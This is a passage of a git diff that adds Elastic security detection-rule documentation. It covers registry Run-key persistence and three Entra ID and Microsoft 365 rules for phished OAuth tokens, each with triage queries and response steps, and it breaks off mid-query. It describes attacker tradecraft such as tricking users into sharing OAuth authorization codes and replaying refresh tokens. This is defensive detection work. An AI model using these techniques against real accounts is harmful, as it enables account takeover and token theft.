+- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.
+- Investigate other alerts associated with the user/host during the past 48 hours.
+- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.
+- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.
+- Examine the host for derived artifacts that indicate suspicious activities:
+  - Analyze the process executable using a private sandboxed analysis system.
+  - Observe and collect information about the following activities in both the sandbox and the alert subject host:
+    - Attempts to contact external domains and addresses.
+      - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.
+      - Examine the DNS cache for suspicious or anomalous entries.
+        - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}}
+    - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.
+    - Examine the host services for suspicious or anomalous entries.
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + + +*False positive analysis* + + +- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign. + + +*Related rules* + + +- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff +- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0 +- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f +- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
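+
+
+To complement the osquery checks in the investigation steps above, the following is a minimal ES|QL sketch that lists other registry changes made by the suspect process on the affected host, which can help establish what else it touched around the time of the alert. It is illustrative only: the host and process names are placeholders.
+
+[source, js]
+----------------------------------
+// Hypothetical triage pivot - replace the host.name and process.name placeholders
+from logs-endpoint.events.registry-*
+| where host.os.type == "windows" and
+  event.type == "change" and
+  host.name == "host-01" and
+  process.name == "suspicious.exe"
+| keep @timestamp, user.name, process.executable, registry.path, registry.data.strings
+| sort @timestamp asc
+| limit 100
+----------------------------------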
+ + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type == "change" and + registry.data.strings != null and registry.hive : ("HKEY_USERS", "HKLM") and + registry.path : ( + /* Machine Hive */ + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\*", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\*", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\\*", + /* Users Hive */ + "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*", + "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\*", + "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\*", + "HKEY_USERS\\*\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\\*" + ) and + /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */ + not registry.data.strings : "ctfmon.exe /n" and + not (registry.value : "Application Restart #*" and process.name : "csrss.exe") and + not user.id : ("S-1-5-18", "S-1-5-19", "S-1-5-20") and + not registry.data.strings : ("*:\\Program Files\\*", + "*:\\Program Files (x86)\\*", + "*:\\Users\\*\\AppData\\Local\\*", + "* --processStart *", + "* --process-start-args *", + "ms-teamsupdate.exe -UninstallT20", + " ", + "grpconv -o", "* /burn.runonce*", "* /startup", + "?:\\WINDOWS\\SysWOW64\\Macromed\\Flash\\FlashUtil32_*_Plugin.exe -update plugin") and + not process.executable : ("?:\\Windows\\System32\\msiexec.exe", + "?:\\Windows\\SysWOW64\\msiexec.exe", + "D:\\*", + "\\Device\\Mup*", + "C:\\Windows\\SysWOW64\\reg.exe", + "C:\\Windows\\System32\\changepk.exe", + "C:\\Windows\\System32\\netsh.exe", + "C:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe", + "C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe", + "C:\\Program Files\\Cisco Spark\\CiscoCollabHost.exe", + "C:\\Sistemas\\Programas MP\\CCleaner\\CCleaner64.exe", + "C:\\Program Files (x86)\\FastTrack Software\\Admin By Request\\AdminByRequest.exe", + "C:\\Program Files (x86)\\Exclaimer Ltd\\Cloud Signature Update Agent\\Exclaimer.CloudSignatureAgent.exe", + "C:\\ProgramData\\Lenovo\\Vantage\\AddinData\\LenovoBatteryGaugeAddin\\x64\\QSHelper.exe", + "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\*\\Installer\\setup.exe", + "C:\\ProgramData\\bomgar-scc-*\\bomgar-scc.exe", + "C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil*_pepper.exe", + "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\*.EXE", + "C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\*\\AdobeARM.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Registry Run Keys / Startup Folder +** ID: T1547.001 +** Reference URL: https://attack.mitre.org/techniques/T1547/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc 
b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc new file mode 100644 index 0000000000..5f959dfa98 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-entra-id-oauth-user-impersonation-scope-detected.asciidoc @@ -0,0 +1,142 @@ +[[prebuilt-rule-8-19-8-suspicious-entra-id-oauth-user-impersonation-scope-detected]] +=== Suspicious Entra ID OAuth User Impersonation Scope Detected + +Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing user_impersonation for a token issued by Entra ID. Adversaries may use this scope to gain unauthorized access to user accounts, particularly when the sign-in session status is unbound, indicating that the session is not associated with a specific device or session. This behavior is indicative of potential account compromise or unauthorized access attempts. This rule flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/Flangvik/TeamFiltration +* https://www.proofpoint.com/us/blog/threat-insight/attackers-unleash-teamfiltration-account-takeover-campaign + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Use Case: Threat Detection +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-In Logs +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Suspicious Entra ID OAuth User Impersonation Scope Detected* + + +Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing `user_impersonation`, and a token issuer type of `AzureAD`. This rule is designed to detect suspicious +OAuth user impersonation attempts in Microsoft Entra ID, particularly those involving the `user_impersonation` scope, which is often used by adversaries to gain unauthorized access to user accounts. The rule focuses on sign-in events where +the sign-in session status is `unbound`, indicating that the session is not associated with a specific device or session, making it more vulnerable to abuse. This behavior is indicative of potential account compromise or +unauthorized access attempts, especially when the user type is `Member` and the sign-in outcome is `success`. The rule aims to identify these events to facilitate timely investigation and response to potential security incidents. This is a New Terms rule that flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. + + +*Possible investigation steps* + + +- Review the `azure.signinlogs.properties.user_principal_name` field to identify the user principal involved in the OAuth workflow. 
+- Check the `azure.signinlogs.properties.authentication_processing_details.Oauth Scope Info` field for the presence of `user_impersonation`. This scope is commonly used in OAuth flows to allow applications to access user resources on behalf of the user.
+- Confirm that the `azure.signinlogs.properties.authentication_requirement` is set to `singleFactorAuthentication`, indicating that the sign-in did not require multi-factor authentication (MFA). This can be a red flag, as MFA is a critical security control that helps prevent unauthorized access.
+- Review the `azure.signinlogs.properties.app_display_name` or `azure.signinlogs.properties.app_id` to identify the application involved in the OAuth workflow. Check if this application is known and trusted, or if it appears suspicious or unauthorized. FOCI (Family of Client IDs) applications are commonly abused by adversaries to evade security controls or conditional access policies.
+- Analyze the `azure.signinlogs.properties.client_ip` to determine the source of the sign-in attempt. Look for unusual or unexpected IP addresses, especially those associated with known malicious activity or geographic locations that do not align with the user's typical behavior.
+- Examine the `azure.signinlogs.properties.resource_display_name` or `azure.signinlogs.properties.resource_id` to identify the resource being accessed during the OAuth workflow. This can help determine if the access was legitimate or if it targeted sensitive resources. It may also help pivot to other related events or activities.
+- Use the `azure.signinlogs.properties.session_id` or `azure.signinlogs.properties.correlation_id` to correlate this event with other related sign-in events or activities. This can help identify patterns of suspicious behavior or potential account compromise.
+
+
+*False positive analysis*
+
+
+- Some legitimate applications may use the `user_impersonation` scope for valid purposes, such as accessing user resources on behalf of the user in a controlled manner. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals.
+- Users may occasionally authenticate using single-factor authentication for specific applications or scenarios, especially in environments where MFA is not enforced or required. If this is expected behavior, consider adjusting the rule or adding exceptions for specific user principals or applications.
+
+
+*Response and remediation*
+
+
+- Contact the user to validate the OAuth workflow and assess whether they were targeted or tricked by a malicious actor.
+- If the OAuth workflow is confirmed to be malicious:
+  - Block the user account and reset the password to prevent further unauthorized access.
+  - Revoke active sessions and refresh tokens associated with the user principal.
+  - Review the application involved in the OAuth workflow and determine if it should be blocked or removed from the tenant.
+  - Investigate the source of the sign-in attempt, including the application and IP address, to determine if there are any additional indicators of compromise or ongoing malicious activity.
+ - Monitor the user account and related resources for any further suspicious activity or unauthorized access attempts, and take appropriate actions to mitigate any risks identified. +- Educate users about the risks associated with OAuth user impersonation and encourage them to use more secure authentication methods, such as OAuth 2.0 or OpenID Connect, whenever possible. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: azure.signinlogs and + azure.signinlogs.properties.authentication_processing_details: *user_impersonation* and + azure.signinlogs.properties.authentication_requirement: "singleFactorAuthentication" and + azure.signinlogs.properties.token_issuer_type: "AzureAD" and + azure.signinlogs.properties.token_protection_status_details.sign_in_session_status: "unbound" and + azure.signinlogs.properties.user_type: "Member" and + event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Application Access Token +** ID: T1550.001 +** Reference URL: https://attack.mitre.org/techniques/T1550/001/ +* Technique: +** Name: Impersonation +** ID: T1656 +** Reference URL: https://attack.mitre.org/techniques/T1656/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc new file mode 100644 index 0000000000..abdeb19bc9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc @@ -0,0 +1,183 @@ +[[prebuilt-rule-8-19-8-suspicious-microsoft-365-userloggedin-via-oauth-code]] +=== Suspicious Microsoft 365 UserLoggedIn via OAuth Code + +Identifies sign-ins on behalf of a principal user to the Microsoft Graph API from multiple IPs using the Microsoft Authentication Broker or Visual Studio Code application. This behavior may indicate an adversary using a phished OAuth refresh token. 
+ +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 59m + +*Searches indices from*: now-60m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ +* https://github.com/dirkjanm/ROADtools +* https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/ + +*Tags*: + +* Domain: Cloud +* Domain: Email +* Domain: Identity +* Data Source: Microsoft 365 +* Data Source: Microsoft 365 Audit Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Resources: Investigation Guide +* Tactic: Defense Evasion + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious Microsoft 365 UserLoggedIn via OAuth Code* + + + +*Possible Investigation Steps:* + + +- `o365.audit.UserId`: The identity value the application is acting on behalf of principal user. +- `unique_ips`: Analyze the list of unique IP addresses used within the 30-minute window. Determine whether these originate from different geographic regions, cloud providers, or anonymizing infrastructure (e.g., Tor or VPNs). +- `target_time_window`: Use the truncated time window to pivot into raw events to reconstruct the full sequence of resource access events, including exact timestamps and service targets. +- `azure.auditlogs` to check for device join or registration events around the same timeframe. +- `azure.identityprotection` to identify correlated risk detections, such as anonymized IP access or token replay. +- Any additional sign-ins from the `ips` involved, even outside the broker, to determine if tokens have been reused elsewhere. + + +*False Positive Analysis* + + +- Developers or IT administrators working across environments may also produce similar behavior. + + +*Response and Remediation* + + +- If confirmed unauthorized, revoke all refresh tokens for the affected user and remove any devices registered during this session. +- Notify the user and determine whether the device join or authentication activity was expected. +- Audit Conditional Access and broker permissions (`29d9ed98-a469-4536-ade2-f981bc1d605e`) to ensure policies enforce strict access controls. +- Consider blocking token-based reauthentication to Microsoft Graph and DRS from suspicious locations or user agents. +- Continue monitoring for follow-on activity like lateral movement or privilege escalation. + + +==== Setup + + + +*Setup* + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
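+
+
+To support the pivoting described in the investigation steps above, the following is a minimal ES|QL sketch that summarizes recent UserLoggedIn events for the flagged principal, including the source IPs and applications involved. It is illustrative only: the user identifier is a placeholder, and the fields mirror those used in the rule query below.
+
+[source, js]
+----------------------------------
+// Hypothetical triage pivot - replace the UserId placeholder with the flagged principal
+from logs-o365.audit-*
+| where event.dataset == "o365.audit" and
+  event.action == "UserLoggedIn" and
+  o365.audit.UserId == "user@example.com" and
+  @timestamp > now() - 24 hours
+| stats
+    login_count = count(),
+    source_ips = values(source.ip),
+    application_ids = values(o365.audit.ApplicationId)
+  by o365.audit.UserId
+----------------------------------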
+ + +==== Rule query + + +[source, js] +---------------------------------- +from logs-o365.audit-* +| where + event.dataset == "o365.audit" and + event.action == "UserLoggedIn" and + source.ip is not null and + o365.audit.UserId is not null and + o365.audit.ApplicationId is not null and + o365.audit.UserType in ("0", "2", "3", "10") and + o365.audit.ApplicationId in ("aebc6443-996d-45c2-90f0-388ff96faa56", "29d9ed98-a469-4536-ade2-f981bc1d605e") and + o365.audit.ObjectId in ("00000003-0000-0000-c000-000000000000") +| eval + Esql.time_window_date_trunc = date_trunc(30 minutes, @timestamp), + Esql.oauth_authorize_user_id_case = case( + o365.audit.ExtendedProperties.RequestType == "OAuth2:Authorize" and o365.audit.ExtendedProperties.ResultStatusDetail == "Redirect", + o365.audit.UserId, + null + ), + Esql.oauth_token_user_id_case = case( + o365.audit.ExtendedProperties.RequestType == "OAuth2:Token", + o365.audit.UserId, + null + ) +| stats + Esql.source_ip_count_distinct = count_distinct(source.ip), + Esql.source_ip_values = values(source.ip), + Esql.o365_audit_ApplicationId_values = values(o365.audit.ApplicationId), + Esql.source_as_organization_name_values = values(source.`as`.organization.name), + Esql.oauth_token_count_distinct = count_distinct(Esql.oauth_token_user_id_case), + Esql.oauth_authorize_count_distinct = count_distinct(Esql.oauth_authorize_user_id_case) + by + o365.audit.UserId, + Esql.time_window_date_trunc, + o365.audit.ApplicationId, + o365.audit.ObjectId +| keep + Esql.time_window_date_trunc, + Esql.source_ip_values, + Esql.source_ip_count_distinct, + Esql.o365_audit_ApplicationId_values, + Esql.source_as_organization_name_values, + Esql.oauth_token_count_distinct, + Esql.oauth_authorize_count_distinct +| where + Esql.source_ip_count_distinct >= 2 and + Esql.oauth_token_count_distinct > 0 and + Esql.oauth_authorize_count_distinct > 0 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Application Access Token +** ID: T1550.001 +** Reference URL: https://attack.mitre.org/techniques/T1550/001/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc new file mode 100644 index 0000000000..6117c668ca --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc @@ -0,0 +1,243 @@ 
+[[prebuilt-rule-8-19-8-suspicious-microsoft-oauth-flow-via-auth-broker-to-drs]] +=== Suspicious Microsoft OAuth Flow via Auth Broker to DRS + +Identifies separate OAuth authorization flows in Microsoft Entra ID where the same user principal and session ID are observed across multiple IP addresses within a 5-minute window. These flows involve the Microsoft Authentication Broker (MAB) as the client application and the Device Registration Service (DRS) as the target resource. This pattern is highly indicative of OAuth phishing activity, where an adversary crafts a legitimate Microsoft login URL to trick a user into completing authentication and sharing the resulting authorization code, which is then exchanged for an access and refresh token by the attacker. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 60m + +*Searches indices from*: now-61m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ +* https://github.com/dirkjanm/ROADtools +* https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra ID Sign-in Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Resources: Investigation Guide +* Tactic: Initial Access + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious Microsoft OAuth Flow via Auth Broker to DRS* + + +This rule identifies potential OAuth phishing behavior in Microsoft Entra ID where two OAuth authorization flows are observed in quick succession, sharing the same user principal and session ID but originating from different IP addresses. The client application is the Microsoft Authentication Broker, and the target resource is the Device Registration Service (DRS). This pattern is indicative of adversaries attempting to phish targets for OAuth sessions by tricking users into authenticating through a crafted URL, which then allows the attacker to obtain an authorization code and exchange it for access and refresh tokens. + + +*Possible Investigation Steps:* + + +- `target`: The user principal name targeted by the authentication broker. Investigate whether this user has recently registered a device, signed in from new IPs, or had password resets or MFA changes. +- `session_id`: Used to correlate all events in the OAuth flow. All sign-ins in the alert share the same session, suggesting shared or hijacked state. +- `unique_token_id`: Lists tokens generated in the flow. If multiple IDs exist in the same session, this indicates token issuance from different locations. +- `source_ip`, `city_name`, `country_name`, `region_name`: Review the IPs and geolocations involved. A mismatch in geographic origin within minutes can signal adversary involvement. +- `user_agent`: Conflicting user agents (e.g., `python-requests` and `Chrome`) suggest one leg of the session was scripted or automated. +- `os`: If multiple operating systems are observed in the same short session (e.g., macOS and Windows), this may suggest activity from different environments. 
+- `incoming_token_type`: Look for values like `"none"` or `"refreshToken"` that can indicate abnormal or re-authenticated activity. +- `token_session_status`: A value of `"unbound"` means the issued token is not tied to a device or CAE session, making it reusable from another IP. +- `conditional_access_status`: If this is `"notApplied"`, it may indicate that expected access policies were not enforced. +- `auth_count`: Number of events in the session. More than one indicates the session was reused within the time window. +- `target_time_window`: Use this to pivot into raw sign-in logs to review the exact sequence and timing of the activity. +- Search `azure.auditlogs` for any device join or registration activity around the `target_time_window`. +- Review `azure.identityprotection` logs for anonymized IPs, impossible travel, or token replay alerts. +- Search for other activity from the same IPs across all users to identify horizontal movement. + + +*False Positive Analysis* + + +- A legitimate device join from a user switching networks (e.g., mobile hotspot to Wi-Fi) could explain multi-IP usage. +- Some identity management agents or EDR tools may use MAB for background device registration flows. +- Developers or IT administrators may access DRS across environments when testing. + + +*Response and Remediation* + + +- If confirmed unauthorized, revoke all refresh tokens for the user and disable any suspicious registered devices. +- Notify the user and verify if the authentication or device join was expected. +- Review Conditional Access policies for the Microsoft Authentication Broker (`29d9ed98-a469-4536-ade2-f981bc1d605e`) to ensure enforcement of MFA and device trust. +- Consider restricting token-based reauthentication from anonymized infrastructure or unusual user agents. +- Continue monitoring for follow-on activity, such as privilege escalation, token misuse, or lateral movement. + + +==== Setup + + + +*Required Microsoft Entra ID Sign-In Logs* + +This rule requires the Microsoft Entra ID Sign-In Logs integration be enabled and configured to collect sign-in logs. In Entra ID, sign-in logs must be enabled and streaming to the Event Hub used for the Azure integration. 
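+
+
+To support the sign-in review described in the investigation steps above, the following is a minimal ES|QL sketch that lists recent sign-ins for the targeted user principal so the IP addresses, user agents, and session identifiers can be compared side by side. It is illustrative only: the user principal name is a placeholder, and the fields mirror those used in the rule query below.
+
+[source, js]
+----------------------------------
+// Hypothetical triage pivot - replace the user principal name placeholder
+from logs-azure.signinlogs-*
+| where event.dataset == "azure.signinlogs" and
+  azure.signinlogs.properties.user_principal_name == "user@example.com" and
+  @timestamp > now() - 24 hours
+| keep @timestamp, source.address, user_agent.original,
+  azure.signinlogs.properties.app_display_name,
+  azure.signinlogs.properties.resource_display_name,
+  azure.signinlogs.properties.session_id,
+  azure.signinlogs.properties.incoming_token_type
+| sort @timestamp asc
+| limit 250
+----------------------------------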
+ + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.signinlogs-* metadata _id, _version, _index +| where + event.dataset == "azure.signinlogs" and + event.outcome == "success" and + azure.signinlogs.properties.user_type == "Member" and + azure.signinlogs.identity is not null and + azure.signinlogs.properties.user_principal_name is not null and + source.address is not null and + azure.signinlogs.properties.app_id == "29d9ed98-a469-4536-ade2-f981bc1d605e" and // MAB + azure.signinlogs.properties.resource_id == "01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9" // DRS + +| eval + Esql.time_window_date_trunc = date_trunc(30 minutes, @timestamp), + Esql.azure_signinlogs_properties_session_id = azure.signinlogs.properties.session_id, + Esql.is_browser_case = case( + to_lower(azure.signinlogs.properties.device_detail.browser) rlike "(chrome|firefox|edge|safari).*", 1, 0 + ) + +| stats + Esql_priv.azure_signinlogs_properties_user_display_name_values = values(azure.signinlogs.properties.user_display_name), + Esql_priv.azure_signinlogs_properties_user_principal_name_values = values(azure.signinlogs.properties.user_principal_name), + Esql.azure_signinlogs_properties_session_id_values = values(azure.signinlogs.properties.session_id), + Esql.azure_signinlogs_properties_unique_token_identifier_values = values(azure.signinlogs.properties.unique_token_identifier), + + Esql.source_geo_city_name_values = values(source.geo.city_name), + Esql.source_geo_country_name_values = values(source.geo.country_name), + Esql.source_geo_region_name_values = values(source.geo.region_name), + Esql.source_address_values = values(source.address), + Esql.source_address_count_distinct = count_distinct(source.address), + Esql.source_as_organization_name_values = values(source.`as`.organization.name), + + Esql.azure_signinlogs_properties_authentication_protocol_values = values(azure.signinlogs.properties.authentication_protocol), + Esql.azure_signinlogs_properties_authentication_requirement_values = values(azure.signinlogs.properties.authentication_requirement), + Esql.azure_signinlogs_properties_is_interactive_values = values(azure.signinlogs.properties.is_interactive), + + Esql.azure_signinlogs_properties_incoming_token_type_values = values(azure.signinlogs.properties.incoming_token_type), + Esql.azure_signinlogs_properties_token_protection_status_details_sign_in_session_status_values = values(azure.signinlogs.properties.token_protection_status_details.sign_in_session_status), + Esql.azure_signinlogs_properties_session_id_count_distinct = count_distinct(azure.signinlogs.properties.session_id), + Esql.azure_signinlogs_properties_app_display_name_values = values(azure.signinlogs.properties.app_display_name), + Esql.azure_signinlogs_properties_app_id_values = values(azure.signinlogs.properties.app_id), + Esql.azure_signinlogs_properties_resource_id_values = values(azure.signinlogs.properties.resource_id), + Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name), + + Esql.azure_signinlogs_properties_app_owner_tenant_id_values = values(azure.signinlogs.properties.app_owner_tenant_id), + Esql.azure_signinlogs_properties_resource_owner_tenant_id_values = values(azure.signinlogs.properties.resource_owner_tenant_id), + + Esql.azure_signinlogs_properties_conditional_access_status_values = values(azure.signinlogs.properties.conditional_access_status), + Esql.azure_signinlogs_properties_risk_state_values = 
values(azure.signinlogs.properties.risk_state), + Esql.azure_signinlogs_properties_risk_level_aggregated_values = values(azure.signinlogs.properties.risk_level_aggregated), + + Esql.azure_signinlogs_properties_device_detail_browser_values = values(azure.signinlogs.properties.device_detail.browser), + Esql.azure_signinlogs_properties_device_detail_operating_system_values = values(azure.signinlogs.properties.device_detail.operating_system), + Esql.user_agent_original_values = values(user_agent.original), + Esql.is_browser_case_max = max(Esql.is_browser_case), + + Esql.event_count = count(*) + by + Esql.time_window_date_trunc, + azure.signinlogs.properties.user_principal_name, + azure.signinlogs.properties.session_id + +| keep + Esql.time_window_date_trunc, + Esql_priv.azure_signinlogs_properties_user_display_name_values, + Esql_priv.azure_signinlogs_properties_user_principal_name_values, + Esql.azure_signinlogs_properties_session_id_values, + Esql.azure_signinlogs_properties_unique_token_identifier_values, + Esql.source_geo_city_name_values, + Esql.source_geo_country_name_values, + Esql.source_geo_region_name_values, + Esql.source_address_values, + Esql.source_address_count_distinct, + Esql.source_as_organization_name_values, + Esql.azure_signinlogs_properties_authentication_protocol_values, + Esql.azure_signinlogs_properties_authentication_requirement_values, + Esql.azure_signinlogs_properties_is_interactive_values, + Esql.azure_signinlogs_properties_incoming_token_type_values, + Esql.azure_signinlogs_properties_token_protection_status_details_sign_in_session_status_values, + 